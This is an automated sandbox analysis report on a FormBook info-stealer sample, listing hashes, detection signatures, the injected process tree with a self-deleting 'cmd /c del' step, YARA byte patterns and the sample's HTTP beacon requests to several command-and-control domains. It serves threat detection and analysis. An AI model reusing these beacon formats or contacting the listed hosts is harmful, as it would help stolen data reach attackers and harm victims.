
# Analysis Report NQQWym075C.exe

## Overview

### General Information

- Sample Name: NQQWym075C.exe
- Analysis ID: 321308
- MD5: bf75ed61e1b1f7b310ec1d999077c4dd
- SHA1: cdced77e176e38ff459cdea08941de26861647cd
- SHA256: 69357684ec8f83d428d2030db5f3d586718207e86457465e7fd37b3b4b7c4db2
- Tags: exe, Formbook

### Detection

FormBook

- Score: 100
- Range: 0 - 100
- Whitelisted: false
- Confidence: 100%

### Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

### Classification

System is w10x64

Processes observed:

- NQQWym075C.exe (PID: 5264, cmdline: 'C:\Users\user\Desktop\NQQWym075C.exe', MD5: BF75ED61E1B1F7B310EC1D999077C4DD)
- RegAsm.exe (PID: 5368, cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, MD5: 6FD7592411112729BF6B1F2F6C34899F)
- explorer.exe (PID: 3388, MD5: AD5296B280E8F522A8A897C96BAB0E1D)
- wlanext.exe (PID: 1844, cmdline: C:\Windows\SysWOW64\wlanext.exe, MD5: CD1ED9A48316D58513D8ECB2D55B5C04)
- cmd.exe (PID: 808, cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe', MD5: F3BDBE3BB6F734E357235F4D5898582D)
- conhost.exe (PID: 5232, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- cscript.exe (PID: 6064, cmdline: C:\Windows\SysWOW64\cscript.exe, MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
- NQQWym075C.exe (PID: 1744, cmdline: 'C:\Users\user\Desktop\NQQWym075C.exe', MD5: BF75ED61E1B1F7B310EC1D999077C4DD)
- RegAsm.exe (PID: 5776, cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, MD5: 6FD7592411112729BF6B1F2F6C34899F)

## Malware Configuration

No configs have been found
Yara matches on memory dumps (Source; Rule; Description; Author; matched strings):

- 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp; JoeSecurity_FormBook; Yara detected FormBook; Joe Security
- 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp; Formbook_1; autogenerated rule brought to you by yara-signator; Felix Bilstein - yara-signator at cocacoding dot com
• 0x85c8:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x8952:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x14655:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x14141:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x14757:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x148cf:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0x936a:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x133bc:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0xa0e2:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x19747:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x1a7ea:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
- 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp; Formbook; detect Formbook in memory; JPCERT/CC Incident Response Group
• 0x16679:\$sqlite3step: 68 34 1C 7B E1
• 0x1678c:\$sqlite3step: 68 34 1C 7B E1
• 0x166a8:\$sqlite3text: 68 38 2A 90 C5
• 0x167cd:\$sqlite3text: 68 38 2A 90 C5
• 0x166bb:\$sqlite3blob: 68 53 D8 7F 8C
• 0x167e3:\$sqlite3blob: 68 53 D8 7F 8C
- 00000002.00000002.274059450.00000000011F0000.00000040.00000001.sdmp; JoeSecurity_FormBook; Yara detected FormBook; Joe Security
- 00000002.00000002.274059450.00000000011F0000.00000040.00000001.sdmp; Formbook_1; autogenerated rule brought to you by yara-signator; Felix Bilstein - yara-signator at cocacoding dot com
• 0x85c8:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x8952:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x14655:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x14141:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x14757:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x148cf:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0x936a:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x133bc:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0xa0e2:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x19747:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x1a7ea:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Yara matches on unpacked PEs (Source; Rule; Description; Author; matched strings):

- 2.2.RegAsm.exe.400000.0.raw.unpack; JoeSecurity_FormBook; Yara detected FormBook; Joe Security
- 2.2.RegAsm.exe.400000.0.raw.unpack; Formbook_1; autogenerated rule brought to you by yara-signator; Felix Bilstein - yara-signator at cocacoding dot com
• 0x85c8:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x8952:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x14655:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x14141:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x14757:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x148cf:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0x936a:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x133bc:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0xa0e2:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x19747:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x1a7ea:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
- 2.2.RegAsm.exe.400000.0.raw.unpack; Formbook; detect Formbook in memory; JPCERT/CC Incident Response Group
• 0x16679:\$sqlite3step: 68 34 1C 7B E1
• 0x1678c:\$sqlite3step: 68 34 1C 7B E1
• 0x166a8:\$sqlite3text: 68 38 2A 90 C5
• 0x167cd:\$sqlite3text: 68 38 2A 90 C5
• 0x166bb:\$sqlite3blob: 68 53 D8 7F 8C
• 0x167e3:\$sqlite3blob: 68 53 D8 7F 8C
- 2.2.RegAsm.exe.400000.0.unpack; JoeSecurity_FormBook; Yara detected FormBook; Joe Security
- 2.2.RegAsm.exe.400000.0.unpack; Formbook_1; autogenerated rule brought to you by yara-signator; Felix Bilstein - yara-signator at cocacoding dot com
• 0x77c8:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x7b52:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x13855:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x13341:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x13957:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x13acf:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0x856a:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x125bc:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0x92e2:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x18947:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x199ea:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

## Sigma Overview

No Sigma rule has matched

## Signature Overview

### AV Detection:

Multi AV Scanner detection for submitted file

- Source: NQQWym075C.exe; Virustotal: Detection: 30%
- Source: NQQWym075C.exe; ReversingLabs: Detection: 48%

Yara detected FormBook

- Source: Yara match; File source: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match; File source: 00000002.00000002.274059450.00000000011F0000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match; File source: 00000005.00000002.261367442.0000000000400000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match; File source: 00000005.00000002.262643764.0000000001290000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match; File source: 00000002.00000002.273804408.00000000011C0000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match; File source: 00000004.00000002.495195854.0000000004A75000.00000004.00000001.sdmp, type: MEMORY
- Source: Yara match; File source: 00000004.00000002.498598158.0000000005FE0000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match; File source: 00000005.00000002.262773877.00000000012C0000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match; File source: 00000006.00000002.483267910.0000000000DF0000.00000004.00000001.sdmp, type: MEMORY
- Source: Yara match; File source: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match; File source: 00000000.00000003.241045829.000000000176E000.00000004.00000001.sdmp, type: MEMORY
- Source: Yara match; File source: 0000000A.00000002.276248841.0000000002960000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match; File source: 00000004.00000002.485157307.0000000001124000.00000004.00000020.sdmp, type: MEMORY
- Source: Yara match; File source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
- Source: Yara match; File source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
- Source: Yara match; File source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
- Source: Yara match; File source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
- Source: Yara match; File source: 4.2.NQQWym075C.exe.5fe0000.3.unpack, type: UNPACKEDPE
- Source: Yara match; File source: 4.2.NQQWym075C.exe.5fe0000.3.raw.unpack, type: UNPACKEDPE

Machine Learning detection for sample

- Source: NQQWym075C.exe; Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

- Source: 2.2.RegAsm.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
- Source: 5.2.RegAsm.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
- Source: 4.2.NQQWym075C.exe.5fe0000.3.unpack; Avira: Label: TR/Crypt.ZPACK.Gen

Found inlined nop instructions (likely shell or obfuscated code)

- Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4x nop then pop ebx; 2_2_00406899
- Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4x nop then pop ebx; 5_2_00406899
- Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 4x nop then pop ebx; 6_2_03246899
- Source: C:\Windows\SysWOW64\cscript.exe; Code function: 4x nop then pop ebx; 10_2_02966899

### Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

- Source: Traffic; Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden; 34.102.136.180:80 -> 192.168.2.3:49728
- Source: Traffic; Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden; 34.102.136.180:80 -> 192.168.2.3:49730
- Source: Traffic; Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden; 23.227.38.64:80 -> 192.168.2.3:49731
- Source: Traffic; Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden; 35.186.238.101:80 -> 192.168.2.3:49744
- Source: Traffic; Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden; 34.102.136.180:80 -> 192.168.2.3:49745

HTTP GET or POST without a user agent

Each request below (Source: global traffic, HTTP traffic detected) carried the headers `Connection: close` and a 7-byte body of `00 00 00 00 00 00 00` (Data Ascii: empty):

- GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=ldw93ncdIRpnK2+SYFZ4XxcSdaL1EJRCuxI9ZUy/FVTDpSzjKcQcxAtGWqTUr4WUWqsB HTTP/1.1; Host: www.ussouthernhome.com
- GET /o56q/?6l=3sSzGDKqeoVzrX5Sn8ux2WAGTszDSWdOTpKicZCtYQqt6BLZU/lZy9O7FBLa6j9xXLzf&Rh=Y2MlpveH8ZUh0bF HTTP/1.1; Host: www.myreviewandbonuses.com
- GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=jRDzq8l+sUykxws9W99RfZyinw9UtZsC3+WzPyJGQo9muB/nYvZVAbl6dW3bW8Aotu+H HTTP/1.1; Host: www.thrust-board.com
- GET /o56q/?6l=kNK7qyUr0rsKRGX6DQjm/XfEOCgL/rCBvSt6iCqDIwEC5hd1LlIznMkcIp/u79mXMRr7&Rh=Y2MlpveH8ZUh0bF HTTP/1.1; Host: www.teelinkz.com
- GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=9Sq28+gy4k4CrtJhpK8mM8fwBZ3GLEhrr70589yX6MfPm6K+L9JTnWLRwUnCkAdg62kX HTTP/1.1; Host: www.not-taboo.com
- GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=M16LsldnfrVP1zxs4qqy0X/sNN1zWVH6uxw1Og8LqWL4V8CpTN5QES3cWjsEPZlyN24a HTTP/1.1; Host: www.tnicholson.design
- GET /o56q/?6l=QJ1vQpsCk7HoC7tcDYJYOCEFb+6oaJChP7LjIwOmauzAYwlZDD68O4FtKEqtEO5AoeDi&Rh=Y2MlpveH8ZUh0bF HTTP/1.1; Host: www.sabaicraft.com
- GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=6yhb1plVNlXQq+RzpSC3aP+nXZqT+h1u1iqVXpUKlvKLd7IxuSoQjy9XoIojNuJhzNIO HTTP/1.1; Host: www.deadroommn.com
- GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=r4u6PaE5VJhGb5HfNIqoFHA5GyORyqjhLy9oIJBoAQE4G0DswHvYnpLSr9alOGw3azvw HTTP/1.1; Host: www.keitakora.com

IP address seen in connection with other malware

- Source: Joe Sandbox View; IP Address: 35.186.238.101
- Source: Joe Sandbox View; IP Address: 198.49.23.141
- Source: Joe Sandbox View; IP Address: 23.227.38.64

Internet Provider seen in connection with other malware

- Source: Joe Sandbox View; ASN Name: CLOUDFLARENETUS
- Source: Joe Sandbox View; ASN Name: GOOGLEUS
- Source: Joe Sandbox View; ASN Name: CLAYERLIMITED-AS-APClayerLimitedHK
Performs DNS lookups

- Source: unknown; DNS traffic detected: queries for: www.ussouthernhome.com
 Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 20 Nov 2020 19:14:52 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:03:34 GMTAccept-Ranges: bytesAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 
29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 404 Error - Page Not Found
Urls found in memory or binary data

- Source: explorer.exe, 00000003.00000000.252651061.0000000008907000.00000004.00000001.sdmp; String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
- Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp; Strings found in binary or memory:
  - http://fontfabrik.com
  - http://www.apache.org/licenses/LICENSE-2.0
  - http://www.carterandcone.coml
  - http://www.fontbureau.com
  - http://www.fontbureau.com/designers
  - http://www.fontbureau.com/designers/?
  - http://www.fontbureau.com/designers/cabarga.htmlN
  - http://www.fontbureau.com/designers/frere-jones.html
  - http://www.fontbureau.com/designers8
  - http://www.fontbureau.com/designers?
  - http://www.fontbureau.com/designersG
  - http://www.fonts.com
  - http://www.founder.com.cn/cn
  - http://www.founder.com.cn/cn/bThe
  - http://www.founder.com.cn/cn/cThe
  - http://www.galapagosdesign.com/DPlease
  - http://www.galapagosdesign.com/staff/dennis.htm
  - http://www.goodfont.co.kr
  - http://www.jiyu-kobo.co.jp/
  - http://www.sajatypeworks.com
  - http://www.sakkal.com
  - http://www.sandoll.co.kr
- Source: wlanext.exe, 00000006.00000002.485637823.00000000034A5000.00000004.00000020.sdmp; String found in binary or memory: http://www.sz360buy.com/d
- Source: wlanext.exe, 00000006.00000002.485456630.0000000003496000.00000004.00000020.sdmp; String found in binary or memory: http://www.sz360buy.com/o56q/?6l=2CtK5nvmO
- Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp; Strings found in binary or memory:
  - http://www.tiro.com
  - http://www.typography.netD
  - http://www.urwpp.deDPlease
  - http://www.zhongyicts.com.cn
- Source: wlanext.exe, 00000006.00000002.489818929.0000000003DA2000.00000004.00000001.sdmp; String found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js

### E-Banking Fraud:

Yara detected FormBook

- Source: Yara match; File source: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match; File source: 00000002.00000002.274059450.00000000011F0000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match; File source: 00000005.00000002.261367442.0000000000400000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match; File source: 00000005.00000002.262643764.0000000001290000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match; File source: 00000002.00000002.273804408.00000000011C0000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match; File source: 00000004.00000002.495195854.0000000004A75000.00000004.00000001.sdmp, type: MEMORY
- Source: Yara match; File source: 00000004.00000002.498598158.0000000005FE0000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match; File source: 00000005.00000002.262773877.00000000012C0000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match; File source: 00000006.00000002.483267910.0000000000DF0000.00000004.00000001.sdmp, type: MEMORY
- Source: Yara match; File source: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match; File source: 00000000.00000003.241045829.000000000176E000.00000004.00000001.sdmp, type: MEMORY
- Source: Yara match; File source: 0000000A.00000002.276248841.0000000002960000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match; File source: 00000004.00000002.485157307.0000000001124000.00000004.00000020.sdmp, type: MEMORY
- Source: Yara match; File source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
- Source: Yara match; File source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
- Source: Yara match; File source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
- Source: Yara match; File source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
- Source: Yara match; File source: 4.2.NQQWym075C.exe.5fe0000.3.unpack, type: UNPACKEDPE
- Source: Yara match; File source: 4.2.NQQWym075C.exe.5fe0000.3.raw.unpack, type: UNPACKEDPE

### System Summary:

Malicious sample detected (through community Yara rule)

Every source listed below matched both of these community rules:

- "autogenerated rule brought to you by yara-signator" (Author: Felix Bilstein - yara-signator at cocacoding dot com)
- "detect Formbook in memory" (Author: JPCERT/CC Incident Response Group)

Matching sources:

- 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, type: MEMORY
- 00000002.00000002.274059450.00000000011F0000.00000040.00000001.sdmp, type: MEMORY
- 00000005.00000002.261367442.0000000000400000.00000040.00000001.sdmp, type: MEMORY
- 00000005.00000002.262643764.0000000001290000.00000040.00000001.sdmp, type: MEMORY
- 00000002.00000002.273804408.00000000011C0000.00000040.00000001.sdmp, type: MEMORY
- 00000004.00000002.495195854.0000000004A75000.00000004.00000001.sdmp, type: MEMORY
- 00000004.00000002.498598158.0000000005FE0000.00000040.00000001.sdmp, type: MEMORY
- 00000005.00000002.262773877.00000000012C0000.00000040.00000001.sdmp, type: MEMORY
- 00000006.00000002.483267910.0000000000DF0000.00000004.00000001.sdmp, type: MEMORY
- 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, type: MEMORY
- 00000000.00000003.241045829.000000000176E000.00000004.00000001.sdmp, type: MEMORY
- 0000000A.00000002.276248841.0000000002960000.00000040.00000001.sdmp, type: MEMORY
- 00000004.00000002.485157307.0000000001124000.00000004.00000020.sdmp, type: MEMORY
- 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
- 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
- 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
- 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
- 4.2.NQQWym075C.exe.5fe0000.3.unpack, type: UNPACKEDPE
- 4.2.NQQWym075C.exe.5fe0000.3.raw.unpack, type: UNPACKEDPE
Contains functionality to call native functions